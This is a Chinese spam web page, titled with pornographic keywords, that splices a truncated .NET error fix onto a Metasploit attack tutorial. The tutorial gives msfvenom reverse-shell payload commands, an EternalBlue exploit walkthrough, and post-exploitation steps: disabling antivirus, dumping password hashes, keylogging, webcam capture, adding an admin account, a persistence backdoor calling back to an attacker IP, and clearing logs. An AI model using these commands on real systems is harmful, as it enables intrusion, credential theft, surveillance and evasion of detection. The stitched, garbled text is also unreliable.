久久亚洲精品国产精品_羞羞漫画在线版免费阅读网页漫画_国产精品久久久久久久久久久久_午夜dj免费观看在线视频_希崎杰西卡番号

net framework 2.0 sp2

前沿拓展:

net framework 2

win7中出現(xiàn) CLR20r3錯(cuò)誤 .net framework 錯(cuò)誤是設(shè)置錯(cuò)誤造成的,解決方法為:

1、待該軟件下載完成后,雙擊打開(kāi)該軟件。

2、進(jìn)入是一款開(kāi)源安全漏洞檢測(cè)工具,附帶數(shù)千個(gè)已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來(lái)信息收集、漏洞探測(cè)、漏洞利用等滲透測(cè)試的全流程,被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名

msfvenom(用于生成木馬文件)net framework 2.0 sp2

-p, –payload <payload> 指定需要使用的payload(攻擊荷載)
-l, –list [module_type] 列出指定模塊的所有可用資源,模塊類(lèi)型包括: payloads, encoders, nops, all
-n, –nopsled <length> 為payload預(yù)先指定一個(gè)NOP滑動(dòng)長(zhǎng)度
-f, –format <format> 指定輸出格式 (使用 –help-formats 來(lái)獲取msf支持的輸出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(編碼器)
-a, –arch <architecture> 指定payload的目標(biāo)架構(gòu)
–platform <platform> 指定payload的目標(biāo)平臺(tái)
-s, –space <length> 設(shè)定有效攻擊荷載的最大長(zhǎng)度
-b, –bad-chars <list> 設(shè)定規(guī)避字符集,比如: 'x00xff'
-i, –iterations <count> 指定payload的編碼次數(shù)
-c, –add-code <path> 指定一個(gè)附加的win32 shellcode文件
-x, –template <path> 指定一個(gè)自定義的可執(zhí)行文件作為模板
-k, –keep 保護(hù)模板程序的動(dòng)作,注入的payload作 為一個(gè)新的進(jìn)程運(yùn)行
–payload-options 列舉payload的標(biāo)準(zhǔn)選項(xiàng)
-o, –out <path> 保存payload
-v, –var-name <name> 指定一個(gè)自定義的變量,以確定輸出格式
–shellest 最小化生成payload
-h, –help 查看幫助選項(xiàng)
–help-formats 查看msf支持的輸出格式列表查看支持的payload列表:msfvenom -l payloads
查看支持的輸出文件類(lèi)型:msfvenom –help-formats
查看支持的編碼方式:(為了達(dá)到免殺的效果):msfvenom -l encoders
查看支持的空字段模塊:(為了達(dá)到免殺的效果):msfvenom -l nops

簡(jiǎn)單payload使用

Linux:

反向連接:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=< Port to Connect On> -f elf > shell.elf
正向連接:msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f asp > shell.asp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.pymsfconsole(命令行)net framework 2.0 sp2

這個(gè)界面可看到metasploit當(dāng)前版本,各個(gè)模塊的插件數(shù)量。

auxiliary掃描模塊exploits漏洞利用模塊payloadsencoders編碼模塊nops空字符模塊psot模塊evasion模塊(創(chuàng)建反殺毒軟件的木馬)

命令行可輸入search尋找利用模塊

msf5 > search MS17_010net framework 2.0 sp2

常用的payload

Linux:

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tc

Windows:

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcpMS17_010 Eternal bule(永恒之藍(lán))

下面用永恒之藍(lán)演示一下

進(jìn)入msfconsole search命令搜索MS17_010

net framework 2.0 sp2

搜索到相應(yīng)的五個(gè)模塊

使用第二個(gè)輔助模塊來(lái)幫助我們探測(cè)哪些主機(jī)存在漏洞 輸入此命令

msf5 > use auxiliary/scanner/**b/**b_ms17_010
msf5 auxiliary(scanner/**b/**b_ms17_010) >

查看所需要的配置信息:show options

net framework 2.0 sp2

使用RHOSTS 參數(shù) 來(lái)查詢(xún)指定IP范圍內(nèi)的主機(jī)是否存在漏洞 第二輸入exploit進(jìn)行探測(cè)

net framework 2.0 sp2

看掃描結(jié)果 我內(nèi)網(wǎng)連的主機(jī)少 結(jié)果前面如果是+,說(shuō)明這臺(tái)主機(jī)存在漏洞

之后就可以使用漏洞利用模塊了 輸入命令 輸入info查看漏洞信息

msf5 auxiliary(scanner/**b/**b_ms17_010) > use exploit/windows/**b/ms17_010_eternalblue
msf5 exploit(windows/**b/ms17_010_eternalblue) > infonet framework 2.0 sp2

查看payloads 命令:show payloads

net framework 2.0 sp2

可以看到很多payload 自己根據(jù)當(dāng)時(shí)情況使用哪個(gè)payload 想用哪個(gè)用哪個(gè)

設(shè)置payload 第二查看參數(shù)

net framework 2.0 sp2

RHOSTS 設(shè)置要攻擊的主機(jī)IP ;LHOSTS 設(shè)置自己的IP 用于接收反彈回來(lái)的shell,默認(rèn)4444端口** 第二exploit開(kāi)始攻擊

接下來(lái)就不演示了 說(shuō)一下exploit攻擊成功后的滲透的相關(guān)命令

1.運(yùn)行了exploit命令之后,就開(kāi)啟了一個(gè)reverse TCP**來(lái)**本地的 4444 端口,攻擊者的本地主機(jī)地址(LHOST)和端口號(hào)(LPORT)。運(yùn)行成功之后,我們將會(huì)看到命令提示符 meterpreter > 出現(xiàn),第二我們輸入: shell 即可切換到目標(biāo)主機(jī)的windows shell,要想從目標(biāo)主機(jī)shell退出到 meterpreter ,我們只需輸入:exit

想要從meterpreter退到msf:background
輸入命令: sessions -l 查看我們獲得的shell
輸入命令:sysinfo 查看攻擊目標(biāo)主機(jī)的相關(guān)信息
查看攻擊目標(biāo)主機(jī)是否在虛擬機(jī)上面運(yùn)行:run post/windows/gather/checkvm
關(guān)閉目標(biāo)主機(jī)上運(yùn)行的殺毒軟件:run killav
獲取目標(biāo)主機(jī)詳細(xì)信息并保存到本地:run scraper
關(guān)于文件的命令:
cd:切換目標(biāo)目錄;
cat:讀取文件內(nèi)容;
rm:刪除文件;
edit:使用vim編輯文件
ls:獲取當(dāng)前目錄下的文件;
mkdir:新建目錄;
rmdir:刪除目錄
關(guān)于上傳文件和下載文件:
upload file 向目標(biāo)主機(jī)上傳文件
download file 在目標(biāo)主機(jī)下載文件

2.關(guān)于提高權(quán)限

1.輸入命令:getsystem 幫助我們提高權(quán)限(提示錯(cuò)誤,但已經(jīng)成功提權(quán))
2.命令:getuid 獲取當(dāng)前用戶(hù)信息(查看是什么權(quán)限)

3.獲取目標(biāo)主機(jī)用戶(hù)名密碼

1.run windows/gather/credentials/windows_autologin 抓取自動(dòng)登錄用戶(hù)的用戶(hù)名和登錄密碼
2.run hashdump hashdump模塊從SAM數(shù)據(jù)庫(kù)導(dǎo)出本地用戶(hù)(得到的密碼哈希值可用 Jhon the Ripper來(lái)破解密碼)

4.關(guān)于目標(biāo)主機(jī)里的程序

1.run post/windows/gather/enum_applications 查看目標(biāo)主機(jī)安裝的應(yīng)用程序
2.execute 此命令可在目標(biāo)系統(tǒng)中執(zhí)行相關(guān)應(yīng)用程序
execute 參數(shù) -f 可執(zhí)行文件
可選參數(shù):
-f:指定可執(zhí)行文件
-H:創(chuàng)建一個(gè)隱藏進(jìn)程
-a:傳遞給命令的參數(shù)
-i: 跟進(jìn)程進(jìn)行交互
-m:從內(nèi)存中執(zhí)行
-t: 使用當(dāng)前偽造的線(xiàn)程令牌運(yùn)行進(jìn)程
-s: 在給定會(huì)話(huà)中執(zhí)行進(jìn)程screenshot 目標(biāo)主機(jī)屏幕截圖 圖片會(huì)保存到/root目錄下

5.創(chuàng)建新本地用戶(hù)

1.run post/windows/gather/enum_logged_on_users 查看當(dāng)前主機(jī)已存在的用戶(hù)
2.run getgui -u username -p password 添加一個(gè)用戶(hù)為username,密碼為password的用戶(hù),第二添加到Administrators組中(如果添加失敗,可以使用之前execute命令運(yùn)行cmd窗口手動(dòng)將用戶(hù)添加到Administrators組中)

6.關(guān)于遠(yuǎn)程桌面

第一確保目標(biāo)主機(jī)開(kāi)啟了遠(yuǎn)程桌面功能

1.idletime 先檢查主機(jī)遠(yuǎn)程用戶(hù)的空閑時(shí)長(zhǎng)
2.run getgui -e
3.run post/windows/manage/enable_rdp 以上兩個(gè)命令都可開(kāi)啟目標(biāo)主機(jī)遠(yuǎn)程桌面功能

7.關(guān)于記錄鍵盤(pán)

1.keyscan_start:開(kāi)啟鍵盤(pán)記錄功能
2.keyscan_dump:顯示捕捉到的鍵盤(pán)記錄信息
3.keyscan_stop:停止鍵盤(pán)記錄功能

8.關(guān)于綁定進(jìn)程實(shí)現(xiàn)meterpreter持久化

ps 查看目標(biāo)設(shè)備中運(yùn)行的進(jìn)程
getpid 查看我們當(dāng)前運(yùn)行的進(jìn)程id
migrate 命令來(lái)綁定目標(biāo)進(jìn)程id(后面跟要綁定進(jìn)程的id即可)
run post/windows/manage/migrate 此命令會(huì)自動(dòng)尋找合適的教=進(jìn)程第二換綁定進(jìn)程

9.關(guān)于目標(biāo)主機(jī)的攝像頭

webcam_list 獲取目標(biāo)主機(jī)的攝像頭列表
webcam_snap 從指定的攝像頭拍攝照片
webcam_stream 從指定的攝像頭開(kāi)啟視頻

10.關(guān)于留后門(mén)

如果目標(biāo)主機(jī)關(guān)機(jī),meterpreter建立的連接就會(huì)斷開(kāi)

所以我們可以在目標(biāo)主機(jī)系統(tǒng)內(nèi)留下一個(gè)持續(xù)性的后門(mén),只要目標(biāo)主機(jī)開(kāi)機(jī),我們就可以連接到該主機(jī)

通過(guò)添加服務(wù)到注冊(cè)表 之后只要開(kāi)機(jī)就會(huì)自動(dòng)啟動(dòng)并連接

run persistence -X -i 8 -p 6666 -r 192.168.10.27 #反彈時(shí)間間隔是8s 會(huì)自動(dòng)連接192.168.27的4444端口,缺點(diǎn)是容易被殺毒軟件查殺
#運(yùn)行之后它就在目標(biāo)機(jī)新建了這個(gè)文件:
C:WindowsTEMPCJzhFlNOWa.vbs 代表把該服務(wù)加入了注冊(cè)表中,只要開(kāi)機(jī)就會(huì)啟動(dòng)
添加之后的連接就是在6666端口進(jìn)行**

11.最后清除**日志(拍拍**走人,要拍干凈才能走哦)

之前我們做的所有**作都會(huì)被記錄在攻擊的目標(biāo)主機(jī)的系統(tǒng)日志文件之中,所以我們需要在完成攻擊之后清除掉**日志

clearev 清除**日志

拓展知識(shí):

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://www.cddhlm.com/10294.html